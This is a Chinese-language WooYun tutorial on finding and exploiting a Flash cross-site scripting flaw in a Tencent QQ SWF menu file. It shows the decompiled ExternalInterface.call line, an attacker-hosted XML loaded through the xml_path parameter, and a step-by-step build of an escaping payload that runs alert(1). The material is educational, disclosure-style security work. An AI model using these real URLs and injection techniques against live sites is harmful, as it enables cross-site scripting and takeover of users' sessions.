WooYun.org

1. 有了上一节教程的基础，这次我们直接见实例。
通过GOOGLE搜索，site:qq.com filetype:swf inurl:xml
我们可以找到以下FLASH。
http://imgcache.qq.com/qzone_v4/2/default_menu_horizontal.swf?xml_path=http://imgcache.qq.com/qzone/client/custom_menu/custom_menu.xml
2. 借鉴上上节教程的思路，我们可以看看http://imgcache.qq.com/qzone/client/custom_menu/custom_menu.xml里是个什么内容。

3. 好像看不出来是个啥用途，我们反编译FLASH文件。

4. 接着我们先看看是否有getURL, ExternalInterface.call之类的。

可以看到，我们搜索到的是下面这句：

flash.external.ExternalInterface.call("custom_menu_swf", menu_array[_local2].href);

那么call的第一个参数是被限定死了～，第2个参数为 menu_array[_local2].href，
如果你对AS有一点了解，不难看出menu_array是一个数组，那么_local2应该就是数组的下标，
而从单词含义“菜单数组”我们不难联想到上面xml文件里的数据。

5. 换句话说，这里我们的可以控制call的第2个参数。同教程14中的方法，我们下载下来http://imgcache.qq.com/qzone/client/custom_menu/custom_menu.xml。 先做点修改，然后上传到自己网站上。
我们将代码里日志那一行的href改掉。

<menu name="日  志" href="\&quot;,alert(1)" />

上传修改后的文件，同时记得将crossdomain.xml上传至自己的网站根目录下哦～～（见教程14）
6. 接着我们载入我们自己指定的XML文件。
http://imgcache.qq.com/qzone_v4/2/default_menu_horizontal.swf?xml_path=http://itsokla.duapp.com/custom_menu.xml
7. 接着我们打开Firefox浏览器。 有人会问，你怎么突然要用Firefox啊！疯了么！！ 同志们，我没疯，只是因为FF可以捕获到这里的错误，而chrome捕获不到！
我们打开Firefox后， 访问上面的地址，点击【日志】按钮！！
Ctrl+shift+J 打开错误控制台！可以看到以下报错！

8. 记性好的朋友，会马上想起上一节里我们说到的。
ExternalInterface.call("函数名","参数1");
实际上执行的是以下内容，

try { __flash__toXML(函数名("参数1")) ; } catch (e) { "<undefined/>"; }

我们就是从FF这里捕获错误到这点的！（:) 当然也还会有其他方法）。
为什么会出错呢? 我们一起来看看。
9. 当我们点击 【日志】按钮时，会调用。
flash.external.ExternalInterface.call("custom_menu_swf", menu_array[_local2].href);
而menu_array[_local2].href 等于 \",alert(1), 进而，我们代入完整的代码，即如下：

try { __flash__toXML(custom_menu_swf("\\",alert(1)")) ; } catch (e) { "<undefined/>"; }

转换过程如下图：

可以看到转换之后，JS代码有点乱，引号到处飞，括号无处寻，因而报错了！
10. 那么我们怎么构造正确的利用代码呢？其实有上一节的知识并不难！

try { __flash__toXML(custom_menu_swf("构造点构造点")) ; } catch (e) { "<undefined/>"; }

首先第一步，要注入自己代码，首先要闭合掉双引号！

try { __flash__toXML(custom_menu_swf("构造点"),alert("构造点")) ; } catch (e) { "<undefined/>"; }

但是从上面转换流程，我们可以看到， " 会变成 \", 即变成了下面的样子，还是突破不出去。

try { __flash__toXML(custom_menu_swf("构造点\"),alert(\"构造点")) ; } catch (e) { "<undefined/>"; }

不过非常庆幸的事情是，这里没有对 \ 进行转义。 我们可以通过输入 \" 来构造。JS的字符串里，\ 用 \\ 表示。如下：

try { __flash__toXML(custom_menu_swf("构造点\\"))}catch(e){alert(1)}//构造点")) ; } catch (e) { "<undefined/>"; }

图片分析如下：

11. 罗嗦了这么多，我们把构造点代码，拿出来，插入到XML文件里。注意以下几点：
11.1 最后构造的代码是\\", 实际我们的输入是\"，然后由FLASH自己转变为\\"的，因而利用代码里只需要输入\"即可。
11.2 由于在XML的节点属性里，双引号写为 "
<menu name="日 志" href="构造点\&quot;))}catch(e){alert(1)}//构造点" />
12. 再次上传文件。打开

http://imgcache.qq.com/qzone_v4/2/default_menu_horizontal.swf?xml_path=http://itsokla.duapp.com/custom_menu.xml

点击日志，看看效果。